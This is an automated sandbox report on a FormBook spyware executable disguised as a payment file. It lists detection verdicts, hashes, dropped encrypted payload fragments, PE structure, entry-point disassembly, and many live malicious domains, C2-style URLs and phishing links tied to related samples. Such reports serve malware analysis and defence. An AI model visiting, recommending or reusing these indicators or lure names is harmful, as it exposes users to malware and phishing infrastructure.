                                                        Classification:mal100.troj.spyw.evad.winEXE@7/3@20/12
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HCA Information:
                                                        • Successful, ratio: 92%
                                                        • Number of executed functions: 43
                                                        • Number of non-executed functions: 290
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 92.204.80.11
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • VT rate limit hit for: PAGO $830.900.exe

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        10:18:16API Interceptor12962835x Sleep call for process: netbtugc.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        63.250.47.40k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                        • www.balclub.top/n6ow/
                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                        • www.kexweb.top/3bdq/
                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                        • www.kexweb.top/3bdq/
                                                        ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.kexweb.top/mfb2/
                                                        ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.kexweb.top/mfb2/
                                                        13.248.169.48GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                        • www.sleephygienist.org/9ned/
                                                        NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
                                                        • www.luxe.guru/s9un/
                                                        Petronas request for-quotation.exeGet hashmaliciousFormBookBrowse
                                                        • www.smilechat.shop/ih4n/
                                                        New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                        • www.sapatarias.online/ep7t/
                                                        PROFORMA INVOICE BKS-0121-24-25-JP240604.exeGet hashmaliciousFormBookBrowse
                                                        • www.healthsolutions.top/cent/
                                                        New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                        • www.dyme.tech/pjne/?lt=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&3ry=nj20Xr
                                                        OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                        • pupydeq.com/login.php
                                                        5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                        • pupydeq.com/login.php
                                                        Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                                        • www.dyme.tech/pjne/
                                                        uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                        • pupydeq.com/login.php
                                                        91.184.0.200FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                        • www.jobworklanka.online/hxxx/
                                                        PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                        • www.jobworklanka.online/c85h/
                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                        • www.jobworklanka.online/ikh0/
                                                        DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                        • www.jobworklanka.online/c85h/
                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                        • www.jobworklanka.online/ikh0/
                                                        ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.synthtv.online/h2pg/
                                                        GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                                        • www.jobworklanka.online/lxkz/
                                                        bintoday1.exeGet hashmaliciousFormBookBrowse
                                                        • www.jobworklanka.online/mm14/
                                                        ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.synthtv.online/h2pg/
                                                        P240842_P240843.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.durkal.online/ht3d/?LjqdxdN0=wyJlkAZPRef/xyPbhfrWrGGI/Xeqxm4pcr0IjHYue8o6lYTmszTOgufsq9uZLmD6QeIH&_Td4vT=ZL3P5PGPdr

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        www.dyme.techNew Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        doc330391202408011.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 13.248.169.48
                                                        INVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        www.chinaen.orgPetronas request for-quotation.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.96.3
                                                        r9856_7.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.96.3
                                                        Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.96.3
                                                        yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.96.3
                                                        6i4QCFbsNi.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.97.3
                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.96.3
                                                        Curriculum Vitae.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.96.3
                                                        webredir.vip.gandi.netPROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        au1FjlRwFR.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        www.elsupertodo.netFATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                        • 148.72.152.174
                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                        • 148.72.152.174
                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                        • 148.72.152.174
                                                        COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
                                                        • 148.72.152.174

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        TRELLIAN-AS-APTrellianPtyLimitedAUhttps://shop.oebbticket.atGet hashmaliciousPhisherBrowse
                                                        • 103.224.182.242
                                                        http://www.nsdta.ca/registered-labs/Get hashmaliciousUnknownBrowse
                                                        • 103.224.212.213
                                                        http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20LutheranGet hashmaliciousUnknownBrowse
                                                        • 103.224.182.253
                                                        OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                        • 103.224.182.252
                                                        5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                        • 103.224.182.252
                                                        uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                        • 103.224.182.252
                                                        firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                        • 103.224.182.246
                                                        firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                        • 103.224.182.246
                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        https://www.has-construction.com/Get hashmaliciousUnknownBrowse
                                                        • 103.224.182.242
                                                        AMAZON-02UShttps://dltxc.s3.ap-southeast-1.amazonaws.com/svs/wx.htm?eml=test@yahoo.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 3.5.149.122
                                                        https://demo.services.docusign.net/webforms-ux/v1.0/forms/10bc61c9dc8dd4ea79884f1c0703f644Get hashmaliciousHTMLPhisherBrowse
                                                        • 13.32.110.96
                                                        https://abena.dotling.com/Get hashmaliciousUnknownBrowse
                                                        • 13.32.99.19
                                                        file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                        • 185.166.143.50
                                                        Modulo32_.jarGet hashmaliciousUnknownBrowse
                                                        • 3.131.123.134
                                                        Prodotto.jarGet hashmaliciousUnknownBrowse
                                                        • 3.23.182.29
                                                        Modulo32_.jarGet hashmaliciousUnknownBrowse
                                                        • 3.130.209.29
                                                        Prodotto.jarGet hashmaliciousUnknownBrowse
                                                        • 3.23.182.29
                                                        hisense.exeGet hashmaliciousUnknownBrowse
                                                        • 3.5.218.57
                                                        hisense.exeGet hashmaliciousUnknownBrowse
                                                        • 54.231.195.249
                                                        HOSTNETNLFATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                        • 91.184.0.200
                                                        PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                        • 91.184.0.200
                                                        z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                        • 91.184.0.111
                                                        firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                        • 91.184.0.99
                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                        • 91.184.0.200
                                                        DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                        • 91.184.0.200
                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                        • 91.184.0.200
                                                        ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 91.184.0.200
                                                        GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                                        • 91.184.0.200
                                                        bintoday1.exeGet hashmaliciousFormBookBrowse
                                                        • 91.184.0.200
                                                        NAMECHEAP-NETUShttps://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wD6jzGRyycT&sa=t&esrc=6jzGRFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ1GcDqhlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fanoboy.pw%2Fojo%2Flok%2F9198595720/#a2FybC5ib25uZXJAYXR1Lmll=$%E3%80%82Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                        • 162.0.228.73
                                                        https://urlz.fr/sarOGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.136
                                                        https://thomasuhe-f90d31.ingress-florina.ewp.live/wp-content/plugins/agrinotcc/pages/region.php?lca#3f735a1f7f42382abGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.137
                                                        https://urlz.fr/s08eGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.14
                                                        https://dhbgry-f2f2b7.ingress-daribow.ewp.live/wp-content/plugins/sdnww/pages/region.phpGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.14
                                                        https://thunderay-f90d31.ingress-florina.ewp.live/wp-content/plugins/agrinotcc/pages/region.php?lcaGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.136
                                                        https://thunderay-f90d31.ingress-florina.ewp.live/wp-content/plugins/agrinotcc/pages/region.php?lca#cd8cc958ad7945febGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.137
                                                        https://urlz.fr/saHmGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.136
                                                        https://londonu-f90d31.ingress-bonde.ewp.live/wp-content/plugins/agrinotcc/pages/region.php?lcaGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.1
                                                        https://urlz.fr/s9ArGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.1

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\01194HH4

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\netbtugc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.121297215059106
                                                        Encrypted:false
                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\autF312.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\PAGO $830.900.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):286720
                                                        Entropy (8bit):7.9954352178268016
                                                        Encrypted:true
                                                        SSDEEP:3072:GkD9tuQ/haPP1G1Jf6mPNBD00G37hAklC+30pDi88jHOCGPDRWefI/9v0vIbEZJK:nqky0PXPN8t/kxVlCweB0vIbEZJLm
                                                        MD5:10E120E14086B94DA73431F0A9F55FA4
                                                        SHA1:3499E9967B6658AF78C8198557D0394E97F33EFB
                                                        SHA-256:B619B3F545939E5C96F741E1C8424FD196FA94C3C5EA595BE357AF02A5E929EF
                                                        SHA-512:048AD861B64A4777D8D504A19052291731BB6BC9BE42CB5080D835E6CA9E6DF4A9D3CA0FA962B28B41C50615843B9C9CCFF8B6BB0F1B5CD6CF5307D001803C24
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.....2O4Yh.S....d.HA...kM8..XGQYZ2O4Y0PQZI525XLHBZX3CN04CB.GQYT-.:Y.Y.{.4~.y. +)xC1!WF"/x$074];.;Up#/'.[[x...z5\'+.9NH|GQYZ2O4 1Y.g)R..8+..:?.Y..y"?.K...sT>.J...RR..!!2eS$.04CBXGQY.wO4.1QQ...o5XLHBZX3.N25HCSGQ.^2O4Y0PQZI%&5XLXBZXSGN04.BXWQYZ0O4_0PQZI523XLHBZX3C.44C@XGQYZ2M4..PQJI5"5XLHRZX#CN04CBHGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQt=PJAXLH&.\3C^04C.\GQIZ2O4Y0PQZI525XlHB:X3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0

                                                        C:\Users\user\AppData\Local\Temp\lards

                                                        Download File
                                                        Process:C:\Users\user\Desktop\PAGO $830.900.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):286720
                                                        Entropy (8bit):7.9954352178268016
                                                        Encrypted:true
                                                        SSDEEP:3072:GkD9tuQ/haPP1G1Jf6mPNBD00G37hAklC+30pDi88jHOCGPDRWefI/9v0vIbEZJK:nqky0PXPN8t/kxVlCweB0vIbEZJLm
                                                        MD5:10E120E14086B94DA73431F0A9F55FA4
                                                        SHA1:3499E9967B6658AF78C8198557D0394E97F33EFB
                                                        SHA-256:B619B3F545939E5C96F741E1C8424FD196FA94C3C5EA595BE357AF02A5E929EF
                                                        SHA-512:048AD861B64A4777D8D504A19052291731BB6BC9BE42CB5080D835E6CA9E6DF4A9D3CA0FA962B28B41C50615843B9C9CCFF8B6BB0F1B5CD6CF5307D001803C24
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.....2O4Yh.S....d.HA...kM8..XGQYZ2O4Y0PQZI525XLHBZX3CN04CB.GQYT-.:Y.Y.{.4~.y. +)xC1!WF"/x$074];.;Up#/'.[[x...z5\'+.9NH|GQYZ2O4 1Y.g)R..8+..:?.Y..y"?.K...sT>.J...RR..!!2eS$.04CBXGQY.wO4.1QQ...o5XLHBZX3.N25HCSGQ.^2O4Y0PQZI%&5XLXBZXSGN04.BXWQYZ0O4_0PQZI523XLHBZX3C.44C@XGQYZ2M4..PQJI5"5XLHRZX#CN04CBHGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQt=PJAXLH&.\3C^04C.\GQIZ2O4Y0PQZI525XlHB:X3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0PQZI525XLHBZX3CN04CBXGQYZ2O4Y0

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.166049228254655
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:PAGO $830.900.exe
                                                        File size:1'280'512 bytes
                                                        MD5:39c39d298ac66acb85c47e7a647bac4e
                                                        SHA1:a2d7ec0eaa52cd8287926c198052dbd99e7366a1
                                                        SHA256:79a2f729b9a56bea58b706b9246e46d6204ae30c549fdbe6bc044e80624947e3
                                                        SHA512:66b4a5d1b63ef20b8a764545a09cf0cd3e61a9a9fe181aedeba6d8877c5cd1995246f90efbe50c8b748b1a5fbf1d5175ce615f92ccba920e05fdb3f0f33b5571
                                                        SSDEEP:24576:Q5EmXFtKaL4/oFe5T9yyXYfP1ijXdaTUWV8sFXU+y7KXH0SvpvZx:QPVt/LZeJbInQRaTxV82lBj
                                                        TLSH:6155BF0273C1C062FFAB92734F5AF6115ABC79260123A61F13981DB9BE705B1563E7A3
                                                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                        File Icon

                                                        Icon Hash:aaf3e3e3938382a0

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4204f7
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x66E44893 [Fri Sep 13 14:13:39 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:0b768923437678ce375719e30b21693e

                                                        Entrypoint Preview

                                                        Instruction
                                                        call 00007FDF60EF8C83h
                                                        jmp 00007FDF60EF858Fh
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        push dword ptr [ebp+08h]
                                                        mov esi, ecx
                                                        call 00007FDF60EF876Dh
                                                        mov dword ptr [esi], 0049FE10h
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        and dword ptr [ecx+04h], 00000000h
                                                        mov eax, ecx
                                                        and dword ptr [ecx+08h], 00000000h
                                                        mov dword ptr [ecx+04h], 0049FE18h
                                                        mov dword ptr [ecx], 0049FE10h
                                                        ret
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        push dword ptr [ebp+08h]
                                                        mov esi, ecx
                                                        call 00007FDF60EF873Ah
                                                        mov dword ptr [esi], 0049FE2Ch
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        and dword ptr [ecx+04h], 00000000h
                                                        mov eax, ecx
                                                        and dword ptr [ecx+08h], 00000000h
                                                        mov dword ptr [ecx+04h], 0049FE34h
                                                        mov dword ptr [ecx], 0049FE2Ch
                                                        ret
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        mov esi, ecx
                                                        lea eax, dword ptr [esi+04h]
                                                        mov dword ptr [esi], 0049FDF0h
                                                        and dword ptr [eax], 00000000h
                                                        and dword ptr [eax+04h], 00000000h
                                                        push eax
                                                        mov eax, dword ptr [ebp+08h]
                                                        add eax, 04h
                                                        push eax
                                                        call 00007FDF60EFB33Dh
                                                        pop ecx
                                                        pop ecx
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        lea eax, dword ptr [ecx+04h]
                                                        mov dword ptr [ecx], 0049FDF0h
                                                        push eax
                                                        call 00007FDF60EFB388h
                                                        pop ecx
                                                        ret
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        mov esi, ecx
                                                        lea eax, dword ptr [esi+04h]
                                                        mov dword ptr [esi], 0049FDF0h
                                                        push eax
                                                        call 00007FDF60EFB371h
                                                        test byte ptr [ebp+08h], 00000001h
                                                        pop ecx

                                                        Rich Headers

                                                        Programming Language:
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e740x17c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x61f88.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1360000x75cc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb10100x1c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc34200x18.rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10300x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x9aa370x9ac0017187df51446e12491449bc34d849147False0.5653003205775444data6.665680008888402IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x9c0000x2fb920x2fc008ab1e4a7788882b436d7b30c3a4c9b0cFalse0.3529327552356021data5.692798211199345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xcc0000x705c0x4800c69381d9330fec33b92360836b24215aFalse0.043511284722222224DOS executable (block device driver @\273\)0.5845774219571381IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xd40000x61f880x620006fd00e699001d2969e71fb63de9e11d2False0.9332923110650511data7.905781149897465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x1360000x75cc0x760040b4850993e12fb1b505490e48047c95False0.7645325741525424data6.798203799100818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                        RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                        RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                        RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                        RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                        RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                        RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                        RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                        RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                        RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                        RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                        RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                        RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                        RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                        RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                        RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                        RT_RCDATA0xdc7b80x5924fdata1.0003313842825257
                                                        RT_GROUP_ICON0x135a080x76dataEnglishGreat Britain0.6610169491525424
                                                        RT_GROUP_ICON0x135a800x14dataEnglishGreat Britain1.25
